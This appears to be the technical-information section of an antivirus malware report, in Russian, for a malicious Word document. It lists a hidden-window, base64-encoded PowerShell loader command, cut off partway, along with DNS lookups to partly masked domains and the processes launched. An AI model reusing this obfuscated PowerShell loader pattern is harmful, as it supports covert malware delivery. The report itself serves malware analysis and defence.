Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAGQAdwBhAG0AeQBuAHMAaABsAD0AJwBRAG0AcAB2AHgAbwBuAHoAJwA7ACQAUwB0AHkAegB5AGUAdAB4ACAAPQAgACcAOQA3AD...
- DNS ASK fe####alcigar.com
- DNS ASK ca####lchron.com
- DNS ASK th#####nsawshack.com
- DNS ASK fo##ast.cl
- DNS ASK te######domicilio.com.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAGQAdwBhAG0AeQBuAHMAaABsAD0AJwBRAG0AcAB2AHgAbwBuAHoAJwA7ACQAUwB0AHkAegB5AGUAdAB4ACAAPQAgACcAOQA3AD...' (со скрытым окном)
- '%ProgramFiles%\windows media player\wmpnscfg.exe'
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "<PATH_SAMPLE>.doc"